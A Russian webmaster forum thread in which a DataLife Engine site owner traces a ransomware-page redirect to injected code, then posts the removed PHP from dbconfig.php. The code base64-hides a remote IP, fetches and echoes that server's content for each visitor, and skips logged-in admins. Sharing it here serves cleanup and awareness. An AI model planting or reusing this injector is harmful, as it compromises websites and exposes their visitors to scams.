Форум Сайтостроение Безопасность

Вирус на DLE в mysql

D
На сайте с 21.04.2013
Offline
75
djneonilin
1168

Всем привет! Захожу сегодня на свой сайт, и редиректит на http://inforg.biz/uploads/thumbs/node.php

Зашел через хром, а там браузер заблокировался мол МВД россии, вы нарушали закон, оплатите штраф.

В общем полазил на фтп, ничего ненашел лишнего, + даты изменений файлов поздние. Сайт заразили недавно. Несколько дней назад.

Отключаю мускул и редиректа не происходит. В общем то с таким никогда не сталкивался, подскажите как там найти эту заразу? Поиск домена по мускулу не принес успеха.

lealhost
На сайте с 07.06.2014
Offline
136
lealhost
#1

С чего вы взяли что в mysql?

Просто к базе не подключается и скрипт пишет ошибку на инициации.

Проверьте файлы сайта AI-Bolit'ом: http://www.revisium.com/ai/

D
На сайте с 21.04.2013
Offline
75
djneonilin
#2
lealhost:
С чего вы взяли что в mysql?
Просто к базе не подключается и скрипт пишет ошибку на инициации.
Проверьте файлы сайта AI-Bolit'ом: http://www.revisium.com/ai/

Запустил сканирование, подождал и вышла 502

502 Bad Gateway
Служба временно недоступна

lealhost
На сайте с 07.06.2014
Offline
136
lealhost
#3

SSH доступа нет к аккаунту?

Вам понадобится SSH, попробуйте запустить через PHP-CLI, выставив настройки, которые описаны в файле readme.txt.

D
На сайте с 21.04.2013
Offline
75
djneonilin
#4
lealhost:
SSH доступа нет к аккаунту?
Вам понадобится SSH, попробуйте запустить через PHP-CLI, выставив настройки, которые описаны в файле readme.txt.

Вы были правы! Айболит помог найти в файле dbconfig.php подозрительное содержимое.

Удалил и все работает. Уже сменил все пароли, надеюсь больше не повторится. Мой был косяк, забыл прописать права на некоторые файлы. Козлы не дремлют однако ☝

Может кому пригодится, удалил вот что: 


function textsafeunworker($id) {

	$id = intval($id);

	$rtn = $id + date("j");

	return $rtn;

}



function workorunwork($in) {

	if (textsafeunworker(64) < 1024) {

	$rtn = base64_decode($in);

	return $rtn;

	}

}

function workallt($newsid) {

	if (date("j") - $newsid > 320 ) {

		$rtn = false;

	} else {

	$get = workorunwork("aHR0cDovLzMxLjIxMC4xMTcuMTg3L3JlYWN0b3IucGhwP3BpZD0yJg==")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);

	if (!isset($_COOKIE[workorunwork("ZGxlX3Bhc3N3b3Jk")])) {

	echo @file_get_contents($get);

	}

	}

}

workallt (date("j"));
Залили дорвей на ДЛЕ Проверьте свой кипер WM(троян Как сменить admin пароль
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#5

не забудьте сменить все пароли и установить патчи безопасности dle

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Вячеслав Скоблей
На сайте с 31.07.2012
Offline
97
Вячеслав Скоблей
#6

Через пару дней повторится. Вы же только следствие очистили, но не причину. Ищите шеллы.

Инструменты для WEB и SEO ( https://tools.100zona.com/?utm_source=searchengines.guru ) в одном месте

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий